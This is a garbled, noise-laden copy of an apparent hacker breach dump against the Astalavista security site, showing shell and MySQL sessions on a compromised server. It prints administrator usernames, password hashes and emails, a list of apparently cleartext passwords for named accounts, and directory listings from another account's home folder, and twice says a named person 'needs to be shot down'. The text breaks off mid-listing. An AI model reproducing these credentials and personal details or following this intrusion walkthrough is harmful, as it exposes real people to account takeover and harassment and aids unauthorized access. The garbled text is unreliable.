! }6 m, \; \) F <description>All availably Exploits.</description>7 m5 c. y7 W6 f7 `5 `, Y
<language>en-us</language>
7 V% Q& C8 {. Y0 V <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>7 z E l$ b7 @/ v9 O0 o
<docs>http://blogs.law.harvard.edu/tech/rss</docs>. Q: A1 ^2 a- o A& e3 h9 v
<generator>Astalavista.com</generator>
) P$ [7 u' D; ]4 r/ \ <webMaster>info@astalavista.com</webMaster>’ . $items . ‘$ ]; {- K5 @5 T6 |7 I/ B2 B9 ?
</channel>7 j* V' [2 t$ B7 c, e
</rss>’;
# O/ u* W: |1 J r8 M& |! h, q& }3 j# ?) i( h8 \4 B7 I9 d
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {; W M7 {5 k3 p. Y, Q. o+ M
unlink (FULLPATH . ‘/feed/exploits.xml’);+ C) \; z! z0 K+ B" M S
}' m! o. s4 m4 G4 I4 l, g8 B
7 y! \' x$ G( C3 a/ U9 f file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);& d/ V1 [0 o# t# K7 k1 G. l3 W
[snip]
( u% T' C5 L' A3 W( Q; V8 ?7 V6 C* C; H* T
sh-3.2$ cat exploits.sh) @, J$ [1 v) U6 q
#!/bin/sh
# x% I5 F& g: d _
% b( N# W$ x3 m0 e7 z. }###########################################################! g9 e3 B8 B1 m
# #9 `9 G" y6 |/ r; A F# _& W J
# Title: milw0rm exploits adder #$ u& i3 B1 ^0 G. i, d
# Description: Add all milw0rm exploits to the ## J! e Q8 Y) _7 ^* A. y$ a
# Astalavista.com database #. J% o+ Y/ R% y; X5 `
# # Q( a' {2 s- e. Y1 L. `0 g- @$ h
# Company: Astalavista Group #
: S* T: Z; o% C# Author: Paulo M. Santos #
& n& m7 a4 Z; T7 e/ z9 p4 O# h# o( @# E-Mail: 链接标记paulo.santos@astalavista.ch #/ b% R# f# @# U5 D% t
# #& s4 X2 R2 E. [# @3 _) F
###########################################################
5 t+ J+ G/ y% L; `) }' e0 o7 z( d
# path' I+ f2 e8 @, x( }% x
this_path=/home/com/public_html/modifications/cronjobs
$ C4 M- o4 |( E3 J3 z8 P8 m
( o& l* D# D( o2 S- p, L" g/ Z# change directory
2 A; ] k2 B" Tcd $this_path
# p' N3 z# c3 h* ?cd tmp/
' ?" j# i2 O9 Q0 }; C' C7 a/ r) l/ m+ K" ]
# delete files
; A3 W F+ v4 srm -rf milw0rm.tar.* &
8 B/ i) ^6 J( E( U8 X& Jrm -rf milw0rm/ &
* e2 |' \$ B( P) k& E5 i% v7 z. h: J3 J2 |. t
# wget milw0rm paket
+ O# t* D& |" k) B z4 x# bwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]& I# E/ _" v6 ?
& I' O1 @2 Q0 `! u% ]: s1 ]( ^
# extract milw0rm paket
+ q) L4 u# |( I4 @- j3 ]tar -xvf milw0rm.tar.bz2. n+ H" t5 R1 a6 a8 b0 {
2 X3 _- y' {0 k6 x1 @3 T, E8 a# change owner
# B u. ~2 l% E, Z( i+ k$ } K' lchown -R com . U$ n2 u1 U( m; q3 |! G3 Z( X
chgrp -R com .
- E/ {9 `& _4 p5 [
' A5 |) r1 e3 M# execute php script
5 C, R8 D3 k, \4 c' s9 |0 Kcd $this_path% _& s( W1 y4 v# k5 h6 @$ i- [+ A
php -q exploits.php
, M. A8 W; a1 O" D- z1 H- V0 ^7 H! S0 \0 d
# delete files& h) `" J) e1 t& q8 ?4 n* x; Z
rm -rf tmp/milw0rm.tar.*5 l, m7 y4 c5 c% j7 m
rm -rf tmp/milw0rm/
8 Y. {. d4 s* i9 i
; F) j" z0 k/ c0 x1 jsh-3.2$ echo “Paulo M. Santos needs to be shot down.”' q# d: a6 H4 s& Y4 ^+ b, K
Paulo M. Santos needs to be shot down.
' ^5 Y* m/ B1 t' u; z' e& u* Y4 i+ B0 c. D+ k& W# I
mysql -u contrexxuser2 -p
7 n5 c8 q5 c3 q8 uEnter password:
8 O: D t( a, CWelcome to the MySQL monitor. Commands end with ; or \g.* [, a7 ^- W" T4 M& T' ~
Your MySQL connection id is 261694" X( l% c# t% V* v/ A8 E7 E; O
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* _/ a. v+ l1 ~* B& ]- B' {2 C: Y
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 r5 t/ l! E, e" p& [0 U
2 v' \. ?. Q- g5 T( r O0 z" _2 _mysql> show databases;2 P; v f# m! M& f! Z
+——————–+
\8 `; v4 F, J. T) C| Database | c" ], L3 q4 u. c
+——————–+. ?0 K, T4 k1 K
| information_schema |9 A5 `" i# J M6 W: H
| com_contrexx2 |
# k8 j/ h; h* U| com_contrexx2_live |
: Z d* `( N4 y' t* L6 M| test |, F/ |! e4 M- U& i( k" R( a
+——————–+
6 ], s* z- R1 m0 F" \4 rows in set (0.00 sec): @2 R4 K- e" i' I& M& S
+ @ b! O. v& f- F- t/ omysql> use com_contrexx2_live
% @8 }2 p7 q) @4 J# S6 _Database changed- I, ]- C* n/ t- Q5 l( ]& f
mysql> show tables;
! ]7 G' Q% e' t( W# h& l8 |+————————————————–+0 a: @- d0 M* K- P% H0 f3 {# h& G
| Tables_in_com_contrexx2_live |7 b8 B. z$ a, W0 K# \' d3 `
+————————————————–+
2 {- w }9 E0 j% E, V/ M6 J. o$ ]; U| cc_banner_counter |% h% X* t, Y8 y
| cc_search_counter |
4 F6 V/ M7 k3 k( w. X| contrexx_access_group_dynamic_ids |# h8 s1 Q# O& Q" I5 o
| contrexx_access_group_static_ids |
! {% D" O. q4 P# Y| contrexx_access_rel_user_group |0 g- y8 V! n9 _/ R
| contrexx_access_settings |1 V7 b2 V, s. `/ Y/ D3 Z* z* b# K
| contrexx_access_user_attribute |
2 y* e& z- P6 S- G| contrexx_access_user_attribute_name |; ?% P- a. j s( @6 C
| contrexx_access_user_attribute_value |
; x6 M G# u& x8 Q4 v| contrexx_access_user_core_attribute |
8 b) H6 M- q9 L4 i {| contrexx_access_user_groups |
, V- ], _- } {1 n& `| contrexx_access_user_mail |
, L( g! K% t: ]& D* I7 l4 O| contrexx_access_user_profile |5 {2 @/ D+ d3 t' {% G' B9 _# h
| contrexx_access_user_title |
% z& m" T* M! d* || contrexx_access_user_validity |
; L; j0 V6 O& Z) D9 _| contrexx_access_users |1 r* \% b) h$ q( m1 R) E- y
| contrexx_backend_areas |
M' A; O& m0 k9 x| contrexx_backups |
% j0 Z, c. B7 m4 i$ R| contrexx_content |
5 y9 y( z j9 C2 @! J# @7 a| contrexx_content_history |
6 D. W; x" a X7 U% o| contrexx_content_logfile |
0 z: f$ Z [ V- U| contrexx_content_navigation |
4 G2 H( g* {5 f. h+ j: u| contrexx_content_navigation_history |& t! L- z; m z$ W3 `' _8 j
| contrexx_ids |+ C* Z5 r8 r" P& A7 \
| contrexx_languages |4 |, _$ x7 F* T9 H" i' U9 @8 B8 K
| contrexx_lib_country |$ u$ \7 v$ |/ j |( }3 J( W
| contrexx_log |$ P* v/ R! O+ j+ f( P2 j
| contrexx_module_alias_source |. Z( m# v6 b; b+ g
| contrexx_module_alias_target |
5 Q, N: S0 z, I, A| contrexx_module_block_blocks |
. k j9 G# m( j$ K$ d| contrexx_module_block_rel_lang |1 S! G Q! ^, b. ~
| contrexx_module_block_rel_pages |7 Y+ ?" C' Z* M- t+ \7 G( ]
| contrexx_module_block_settings |+ g# a- O7 E5 f( I( Y: \0 z% c
| contrexx_module_blog_categories |
: }0 A5 A% i' ]0 y| contrexx_module_blog_comments |9 P0 V8 s9 Z7 ]' J4 I
| contrexx_module_blog_message_to_category |
8 g3 |/ P5 ~3 q6 n9 Z3 E; W: i| contrexx_module_blog_messages |1 }' L% R }8 R. m6 I' B* D: Y
| contrexx_module_blog_messages_lang |
4 Y7 L+ Y. ?- E$ @| contrexx_module_blog_networks |
7 L' z$ G2 d8 l# _| contrexx_module_blog_networks_lang |5 Z6 I/ q: S* Z# B
| contrexx_module_blog_settings |
" } g( I+ }# J7 N' o7 B0 Z M0 J| contrexx_module_blog_votes |* _8 y$ K2 l: k, F
| contrexx_module_calendar |/ F* v$ ~8 g6 O! Y' C9 z
| contrexx_module_calendar_access |, n2 ^" k3 r5 f' P
| contrexx_module_calendar_categories |
1 ^* B: d8 S! T% j' I' O, Q| contrexx_module_calendar_form_data |
( `, |6 y" o K2 H| contrexx_module_calendar_form_fields |
5 T$ P; C6 T9 {6 V; s| contrexx_module_calendar_registrations |
7 ~/ o, [" q, e| contrexx_module_calendar_settings |8 f" s x% j5 E
| contrexx_module_calendar_style |# l; R+ F7 Y/ o/ k; i5 N
| contrexx_module_contact_form |3 t" t# }: q5 r
| contrexx_module_contact_form_data |6 ?8 j: |/ p* Z# @5 a
| contrexx_module_contact_form_field |5 G: M' z- y8 X+ s! o
| contrexx_module_contact_settings |
$ [$ e+ ~; c+ _+ q' g" R4 V, d| contrexx_module_data_categories |
}+ ?, R7 x6 M: K( {$ \( O% V| contrexx_module_data_message_to_category |
2 F B4 g5 z9 ~3 }7 L* Q& h| contrexx_module_data_messages |& W$ d* m* N& A) |
| contrexx_module_data_messages_lang |+ S8 K6 v1 {' u" ^! j: o
| contrexx_module_data_placeholders |
) R/ t" N* a% b7 y6 w# j| contrexx_module_data_settings |* I0 f4 G1 a! S0 b- I
| contrexx_module_directory_access |
. J. M) S: `4 @: Q4 ^+ J& n| contrexx_module_directory_categories |' E E8 k+ f: K/ t* s) J
| contrexx_module_directory_dir |- r) a8 e4 U; e2 k8 `3 Z
| contrexx_module_directory_inputfields |" P1 \0 [; ~- T# p' E; x
| contrexx_module_directory_levels |
+ S) Y9 e; z8 B9 Y9 y| contrexx_module_directory_mail |
8 N7 r) e. t6 ]- [) L, b| contrexx_module_directory_rel_dir_cat |; C; o/ ~8 ]5 B7 z" }
| contrexx_module_directory_rel_dir_level |1 D, c. B; h& ^' P9 N& n; }
| contrexx_module_directory_settings |- b1 M2 E- y8 h) U8 N" r
| contrexx_module_directory_settings_google |- [# i1 h2 y [% D
| contrexx_module_directory_vote |
! h. |: b Y: [7 v| contrexx_module_docsys |6 }* y9 Z/ T/ @: x& W1 e
| contrexx_module_docsys_categories |
! q7 c Q2 r! c" \$ B+ C, I| contrexx_module_egov_configuration |
4 A u6 ~3 ^1 N2 I) s/ a" Q| contrexx_module_egov_orders |
2 e- m, N% G8 n1 ?$ N( k) ?) K| contrexx_module_egov_product_calendar |
' F9 F- f2 i8 J/ y| contrexx_module_egov_product_fields |
- w& L) o u3 t& q: q9 a$ W+ [* R| contrexx_module_egov_products |; c2 s( b1 M' K; D. x: X
| contrexx_module_egov_settings |
2 @% \7 m; S2 k0 E# r| contrexx_module_exploits |6 _2 X$ L8 u/ N: J: k4 O8 e0 O
| contrexx_module_exploits_categories |
" y5 f* ?' ]1 d0 a6 A0 q* j5 R/ c| contrexx_module_feed_category |- ]2 m( t8 T" [* _- ^$ _. |! g- `. w J
| contrexx_module_feed_news |4 j3 F4 L$ H6 z
| contrexx_module_feed_newsml_association |+ e7 b9 a# b* ]% N0 j l0 l8 T
| contrexx_module_feed_newsml_categories |
* J" i W# F1 C5 S1 g| contrexx_module_feed_newsml_documents |0 t S+ L" K! i) e
| contrexx_module_feed_newsml_providers |' g" ~1 @+ m+ q/ C m
| contrexx_module_forum_access |$ @& K$ n1 ]7 n- @/ y2 ]$ Q' s
| contrexx_module_forum_categories |
' Y* J# W! @" l: o| contrexx_module_forum_categories_lang |
( v7 r& Z1 U# r! M| contrexx_module_forum_notification |& r( W$ Y/ Q& b+ z9 w
| contrexx_module_forum_postings |/ W3 m o w3 N7 G
| contrexx_module_forum_rating |! E0 }* j# T( X8 z. G
| contrexx_module_forum_settings |
& j: {0 J" n- P9 s1 u0 f* }| contrexx_module_forum_statistics |( Q4 W0 W5 T0 K) z* V8 o
| contrexx_module_gallery_categories |; x6 ~0 P2 Y1 |7 v# v
| contrexx_module_gallery_comments |8 X' U7 j% _$ {, e$ R) H5 F
| contrexx_module_gallery_language |" P0 W# z3 p) k* C( U2 ?$ n
| contrexx_module_gallery_language_pics |0 r: m. N- U, f+ B3 W, t
| contrexx_module_gallery_pictures |/ a5 Y5 T; M+ D2 T
| contrexx_module_gallery_settings |
' w' V7 K( o9 N3 L6 p) u. p| contrexx_module_gallery_votes |$ `" |2 d- R+ E, C
| contrexx_module_guestbook |
' I: X' J! K$ g% S2 R, O; R| contrexx_module_guestbook_settings |
# q) V7 [3 T/ p7 N( e& h| contrexx_module_livecam |
- Z, u# Q3 N% c( P& C- c| contrexx_module_livecam_settings |
, [! P/ a2 P3 || contrexx_module_market |
7 V' Z8 c3 v: n+ o" m7 h# Y| contrexx_module_market_access |
! k# t, z' D' ~, U+ A. _6 ~| contrexx_module_market_categories |
8 y, h; v- I; N6 J' J, Q| contrexx_module_market_mail |
/ J( Q% ?6 C/ E3 \6 O! {8 Y: D| contrexx_module_market_paypal |2 h" G" d' V: Y* `
| contrexx_module_market_settings |. V% u/ g2 s: ]: q' t
| contrexx_module_market_spez_fields |: q5 e, E8 M# l; e$ ]% g$ x A
| contrexx_module_mediadir_access |
, K9 x8 a/ E% H @* X. m| contrexx_module_mediadir_categories |) i( }/ o9 o, s3 E- r
| contrexx_module_mediadir_comments |
& h5 x7 o. b9 L7 |% A6 {1 C: n- k| contrexx_module_mediadir_dir |2 s/ ?) [, a/ j/ g, Q. M5 c
| contrexx_module_mediadir_inputfields |
5 T5 k1 e; d* p+ n& I) ?| contrexx_module_mediadir_levels |+ y/ _ G% c/ u- j% ^6 g
| contrexx_module_mediadir_mail |/ n D- y6 v; e' ^* W7 A
| contrexx_module_mediadir_rel_dir_cat |9 x3 m* r& m2 m$ Q3 o
| contrexx_module_mediadir_rel_dir_level |
. [8 [" ~- ^8 c/ A9 P8 W| contrexx_module_mediadir_reports |" i G% }! m4 s' U8 B& G
| contrexx_module_mediadir_settings |. q) G! B; |0 A, u# e) _: n( v4 v
| contrexx_module_mediadir_settings_google |6 I1 j" [& Z& V' z& o5 }' q4 ^
| contrexx_module_mediadir_vote |
0 P. F$ ^: ^4 o% Y9 J0 k* r' W| contrexx_module_memberdir_directories |, q( x) A- l" P/ A% G: k
| contrexx_module_memberdir_name |
+ |; ?( k W! |6 H" s| contrexx_module_memberdir_settings |
2 b2 s+ I/ ^& ^6 B| contrexx_module_memberdir_values |3 t9 f) F; o# s. f L& ~6 Z9 Q
| contrexx_module_nettools_allowed_groups |
0 O* D( D* d8 X# q8 M| contrexx_module_nettools_settings |5 p) z( j5 r2 w( h) T& S, g: k1 h1 k
| contrexx_module_news |; Q# g, D5 c$ b3 Q5 {
| contrexx_module_news_access |
+ D( r; r! t7 P| contrexx_module_news_categories |
4 x# o. P) p* z5 J& h| contrexx_module_news_settings |
4 m7 [: |7 v4 q| contrexx_module_news_teaser_frame |/ T. j7 G& C( X/ D/ W) X+ t
| contrexx_module_news_teaser_frame_templates |
; b2 L: ?# [4 A! m5 `+ w* ~| contrexx_module_news_ticker |% T5 F$ c: v/ {& O. S% Q2 O
| contrexx_module_newsletter |
9 W E! }! Q5 p6 L5 V6 g| contrexx_module_newsletter_attachment |5 P" K4 u3 {' h, o/ z
| contrexx_module_newsletter_category |
# x$ ^+ m/ o* ]/ b, t" \| contrexx_module_newsletter_confirm_mail |
* a) y5 y7 O) R+ } {" A| contrexx_module_newsletter_rel_cat_news |3 Q' e( A* K1 [5 T' @$ u
| contrexx_module_newsletter_rel_user_cat |0 M2 v* `# J# ` Q; D1 l$ V
| contrexx_module_newsletter_settings |- U) j8 G7 H1 f! S% S
| contrexx_module_newsletter_template |$ G0 E* @9 E9 e" J+ C y
| contrexx_module_newsletter_tmp_sending |
$ i$ h7 g$ m4 g' y8 ?7 D2 {$ h| contrexx_module_newsletter_user |) ?) H' Q/ W( u$ H8 i8 |) j
| contrexx_module_newsletter_user_title |
1 `2 [6 ~/ M8 I, L. l- \6 A; f| contrexx_module_onlinetools_defaultports |
5 l" V+ o# S2 n! || contrexx_module_onlinetools_defaultports_back |" J0 O0 T3 O8 l, E1 e
| contrexx_module_onlinetools_geolitecity_blocks |
' E* @( ?8 N9 N+ l| contrexx_module_onlinetools_geolitecity_country |
( y% Y w4 @$ v; @| contrexx_module_onlinetools_geolitecity_location |5 f% O6 G! s8 \# [% t& p( X
| contrexx_module_podcast_category |
: m* D+ b0 S$ l8 r| contrexx_module_podcast_medium |
. j' ^1 h1 L$ o8 t$ C1 u8 T) t| contrexx_module_podcast_rel_category_lang |$ n* F6 |0 |: V4 K1 f
| contrexx_module_podcast_rel_medium_category |
9 w* c' [" M! h/ R: D| contrexx_module_podcast_settings |( q$ C. m5 t! R2 Q: M
| contrexx_module_podcast_template |1 K+ C! g: @, t8 O1 }0 B
| contrexx_module_proxydb |* G4 b2 X, t+ C: k1 Y
| contrexx_module_recommend |- i G) M2 D: W% Q* m, S) Z" \
| contrexx_module_repository |& [3 m- Z8 v& J6 E. k# ^
| contrexx_module_securitynews_cats |8 _: w) S- {7 {7 n6 T! L
| contrexx_module_securitynews_feeds |; D, F+ T8 W1 }. a% @- F
| contrexx_module_securitynews_news |
^# o Z" Q0 {( M6 G| contrexx_module_shop_categories |
7 w+ [( L( M) k# r6 l| contrexx_module_shop_config |. w2 Z0 C+ L: [
| contrexx_module_shop_countries |3 m6 E! d, Z, `$ S/ j/ U O
| contrexx_module_shop_currencies |
* a9 y( b7 ~: v4 ?5 y: E+ t+ Y| contrexx_module_shop_customers |) J* m/ {& C: ?3 ?% X
| contrexx_module_shop_importimg |& J2 z$ h; b4 r/ J* [
| contrexx_module_shop_lsv |1 G$ {" b; |: T0 p; K$ b
| contrexx_module_shop_mail |
! N6 x* c9 M: i| contrexx_module_shop_mail_content |
7 N: A1 A; ]5 t; w: Z4 h| contrexx_module_shop_manufacturer |# L2 S& P: e" o) m Y( f' I& M
| contrexx_module_shop_order_items |& \ o1 k1 H, x( k& L n. `6 G
| contrexx_module_shop_order_items_attributes |' K1 }( f% M: Q( A% o( D2 g& X
| contrexx_module_shop_orders |; x7 C% d" z* T" \ a: \) o
| contrexx_module_shop_payment |
+ p u2 [; s! L7 Y% G3 i9 j| contrexx_module_shop_payment_processors |
% M* s' }' J, ]- }, s| contrexx_module_shop_pricelists |
6 H0 {0 E! i8 c' a; x| contrexx_module_shop_products |4 z* m- O6 e" b- g9 x) K
| contrexx_module_shop_products_attributes |
; [, M% b1 ? e( ?| contrexx_module_shop_products_attributes_name |
* L1 N, k- i" s$ Y| contrexx_module_shop_products_attributes_value |: i a' [) y9 ]
| contrexx_module_shop_products_downloads |( J' E9 ?3 H* y
| contrexx_module_shop_rel_countries |
9 G( Z4 C k, P% q3 A% X| contrexx_module_shop_rel_payment |! y5 S! |+ X# M& h* {
| contrexx_module_shop_rel_shipment |* o G" H1 W: W% ?4 X
| contrexx_module_shop_shipment_cost |
0 h: l6 S p% b) x4 o' t* F| contrexx_module_shop_shipper |4 i( R2 N. T# _0 l$ h0 J
| contrexx_module_shop_vat |, [. d% {7 Z1 g& [# Y
| contrexx_module_shop_zones |, q' ^( H& K' n6 k3 `, w: n7 a
| contrexx_module_u2u_address_list |% r$ S; R! w; p/ `8 k& u5 e
| contrexx_module_u2u_message_log |( H6 S! H6 X, g+ U0 n" B% Y( z
| contrexx_module_u2u_sent_messages |) J9 U$ n5 K( ~& M0 h) z
| contrexx_module_u2u_settings |
6 |; M# k0 t+ Z% f3 O# m| contrexx_module_u2u_user_log |' q7 G: g. ~/ G! \( ^2 @
| contrexx_modules |0 a3 Z7 B! q: A8 v( l( n2 I
| contrexx_sessions |" }# `& l5 a0 j
| contrexx_settings |8 y) @7 L" j$ u, M$ _# w
| contrexx_settings_smtp |7 p# D% q3 g0 M+ v3 a
| contrexx_skins |; S! O2 L3 d' V9 e) x; V y
| contrexx_stats_browser |
9 W3 x9 `6 k/ J' V7 G/ T| contrexx_stats_colourdepth |
' l, G& r3 E3 z/ e4 g| contrexx_stats_config |# y8 Y+ e6 a: R2 j1 d
| contrexx_stats_country |
; q/ V3 Y3 ~3 F| contrexx_stats_hostname |5 T" y T' Y( o9 v7 ]' q6 p" _1 K8 y
| contrexx_stats_javascript |
& u) v" Z% ~( s; D8 i C7 m' o9 R9 [* X| contrexx_stats_operatingsystem |
5 S# N1 f$ O3 u. W; y& p| contrexx_stats_referer |
0 {6 w Q& K7 @0 G) X| contrexx_stats_requests |! B( C" V* `* V4 u, p; v; a2 v
| contrexx_stats_requests_summary |
- E7 v! ~0 k6 {1 p9 I( e0 y| contrexx_stats_screenresolution |' Y# m, N; r# a
| contrexx_stats_search |! g% @( Y3 [0 t7 ~6 y% ~, @
| contrexx_stats_spiders |' P, x' e1 X2 x) j0 c
| contrexx_stats_spiders_summary |
! T1 d) f& j/ h/ {| contrexx_stats_visitors |2 w# H! D* Z. G6 C5 |8 b
| contrexx_stats_visitors_summary |
$ _- ^! W& w, Q5 Z* n- O5 H5 T; T| contrexx_voting_additionaldata |7 s' F) F) v/ r. c
| contrexx_voting_email |
" N0 E& m$ ?8 _; a| contrexx_voting_rel_email_system |
" J9 e# g9 K( w3 o. Y, G* k| contrexx_voting_results |
# _+ |; V: S7 a. R5 A0 I3 d6 D% K| contrexx_voting_system |4 X$ j3 [) V- o+ K5 N
| foo |
& V1 h. g( Z k: J* t+————————————————–+
' ^. m- y* z, x- q" U& Q: y$ i227 rows in set (0.01 sec)8 R7 U: L7 b- C; ?1 r: R3 H+ v
- s% Z' Y& b& \. ^mysql> select count(*) as skids from contrexx_access_users;
. r0 u/ C W f5 t# |0 X" w% T+——-+
. F0 x7 ~$ I8 p| skids |
( z9 U' k5 d2 X7 ?( k+——-+
2 K5 V" u, [0 Q$ {* ^( y| 53699 |
, b+ ], U1 [. Z7 M7 w& w+——-+
" G% Y" H0 ?( v y1 row in set (0.00 sec)
3 L9 @% f( D! {' B' O4 a* {! w8 E: \2 e+ ]" J
mysql> describe contrexx_access_users;( H. M" S, n" e7 o3 i3 s
+——————+——————————————+——+—–+————–+—————-+
4 G D0 B5 S2 V o- {* r5 n# h" F: N| Field | Type | Null | Key | Default | Extra |
8 w( F6 U) w; Q$ b9 A+ V+——————+——————————————+——+—–+————–+—————-+
! o0 m( X- N/ [+ f8 y. S0 B| id | int(10) unsigned | NO | PRI | NULL | auto_increment |$ c1 Y+ \9 R8 X" j4 q
| is_admin | tinyint(1) unsigned | NO | | 0 | |
5 ^& a I0 X8 |' M9 n| username | varchar(40) | YES | MUL | NULL | |0 V$ o7 T9 ^- D( ^
| password | varchar(32) | YES | | NULL | |
$ B" h. B0 y# t( p0 `( r/ g| regdate | int(14) unsigned | NO | | 0 | |; P0 \3 H" H: q- Q2 F; |0 b) U
| expiration | int(14) unsigned | NO | | 0 | |1 P* r, R8 U. d" Y. @. W, ^
| validity | int(10) unsigned | NO | | 0 | |
5 t7 h( w S* \8 X$ U| last_auth | int(14) unsigned | NO | | 0 | |
" J/ q5 G9 E2 [& a| last_activity | int(14) unsigned | NO | | 0 | |
) [, ]- \4 h8 f/ H) R( u$ g4 f| email | varchar(255) | YES | | NULL | |5 Q, i9 V+ s7 b% a6 `
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
# V6 H7 Y6 ^) \1 I) A| frontend_lang_id | int(2) unsigned | NO | | 0 | |" I, ^0 v1 \! U6 ]# s
| backend_lang_id | int(2) unsigned | NO | | 0 | |
. y( T# f+ i# a. {' }/ N7 B| active | tinyint(1) | NO | | 0 | |
: m% z5 `3 X+ e| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
I# g+ |2 T3 {! P' u0 L| restore_key | varchar(32) | NO | | | |
- c4 b1 s! r* h. a8 k9 p| restore_key_time | int(14) unsigned | NO | | 0 | |/ z" i9 B* H- B0 Y; n9 O
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
3 P4 d$ P9 @& a0 }5 v+——————+——————————————+——+—–+————–+—————-+& \; V' M$ @: @1 |" k6 {
18 rows in set (0.00 sec)
. a7 |- Q3 Y! _5 W U. C( k9 ?! c! {/ b
5 b+ F- [7 z4 Kmysql> select username,password,email from contrexx_access_users where is_admin = 1;
; h9 i, L5 e) s+————+———————————-+—————————–+( Y! _6 I' R0 L; n
| username | password | email |# v: F) P) J1 s: c4 V0 N
+————+———————————-+—————————–+
7 C7 x8 V( x2 H+ ]8 k| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
0 P: `6 @9 r& K* Z/ t) |' W2 O| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |( \1 S1 Z2 s5 O* J$ l( p6 a
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
2 E3 r/ h7 h0 j1 T' c7 @+ }) v! L| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |3 g$ |! x2 _0 P3 y+ u6 {* o3 m
+————+———————————-+—————————–+
3 v! |' _7 |/ O0 \# k. d1 r4 rows in set (0.04 sec)
5 g, K! Q" s& g, l1 n q9 c% L y6 R) B; y# ^
mysql> exit;
! Y! `( r0 ~1 h* x2 yBye/ q4 A3 u. c# ^" A6 s! `: k$ T
# h* X x% h( \5 C o7 q W
[~] There you go, your “team of security and IT professionals” is a joke.
1 ^5 }' e9 g( U2 y; g/ k" K. `% L+ u8 y" V& A; C+ E
+——————————+% C; \: ?3 T& h1 d
system:f82BN3+_*
' y9 I6 N) D% P7 b2 qBe1er0ph0r:belerophor4astacom0 i8 }; X4 Q3 j0 J4 D
prozac:asta4cms!- X% U" ~9 m* U& x/ W
commander:mpbdaagf6m
/ b8 I- i( k7 P9 qsykadul:ak29eral
`$ A0 w, f7 C+ n" }9 U! {* O% A& Q+——————————+- j3 ?$ l- { Z2 j
3 b6 E) ~% Q4 J; | w& O6 n[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
' K3 g1 e* A- {2 z6 D3 M…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.3 T* T* l5 n9 o K, o! H
; a! U) x' m7 e, P7 [2 g4 r[~] Lets move to astalavista.net now,* t) h @: g$ g( _4 Z% |
1 c, H3 g$ G* k( a2 f1 z
From <链接标记[url]https://www.astalavista.net/[/url]>:
% z# H7 \: x$ R>> Everyone knows that the best defense is a good offense.- f2 U% R: Y. U9 S# J$ \
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
6 j. |! a9 D' m* [! N# ?1 e. x>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
1 n" l9 X( R. S' b>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
9 ^- S' @: e' ^* D
. N8 r% L+ u. a _8 q' ?7 D+ U3 ~# q>> Go ahead, try and hack our server . in a completely legal way!/ O* l" ]8 I; \0 p6 c+ e
>> Learn by doing: We offer our members tricky tasks and challenges on an
1 }6 |4 l/ ]; V3 K>> ongoing basis so you can test your knowledge and abilities. You can also
, d! K8 y7 X' c4 M5 U>> demonstrate what you.ve mastered by taking part in regular hacker contests7 z- G0 Z4 w, ^' K
>> and war games: ?5 @' f7 ]/ x' L4 z7 F8 p
1 ^7 @% e* W5 O5 M9 v& C# z[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
5 |( q" i8 F* K% o) F
: ~4 l+ D6 k6 L4 K[-] Tricky task: Find home dir of astalavista.net
' P6 @. n. |* G# R2 o! M0 m2 @) s# u; G6 ~2 i0 v7 u
sh-3.2$ ls -la ~astanet/ f7 H; _# K7 l B' a8 ~+ w
total 48
2 D3 \5 ?! S1 h$ m3 G' x Y" ]drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
) U! i5 R% c# [0 T e# ^7 Idrwxr-xr-x 14 root root 4096 Mar 11 17:56 .." y8 v" _: z, c* w: O9 G+ c
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
; g! o# a' R ?0 ]6 |-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history, |* g, Y& n0 V1 M: g7 v9 k
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- ~7 ^/ c. Z, }2 b, W& f/ ?( t7 @-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
; Y0 ~4 W1 t7 F4 j f-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc" i& ~. D2 T) F7 P% F l
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
6 }* T2 W8 N# ?3 d# H7 s- Sdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap3 x- ^1 W5 G \' V( d9 D8 e
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail" a% Y; w8 D- o3 }
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html% | H6 B% i7 r0 j' N" T
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
, c2 r0 g2 D) t& g5 ~- H% ^6 H
% X9 i+ p" G" f' Vsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
/ C; [* D4 E Q, Vsh-3.2$ ls -la
: u% h, M' g0 b* n7 F8 h; Gtotal 2008 l- s3 {; b9 A$ C$ A
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
8 `( _ P# _' m7 x# s$ U" h, fdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..: P4 F$ j, I% X: Q }
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007; E/ I' j+ i. G
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
